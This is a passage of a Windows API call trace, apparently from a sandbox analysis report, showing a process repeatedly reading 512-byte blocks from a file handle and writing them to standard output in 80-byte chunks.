lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.264] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 
[0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.265] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.265] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 
[0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0127.266] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.266] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.267] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.267] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType 
(hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.268] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, 
lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, 
lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.269] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, 
lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.270] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.270] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 
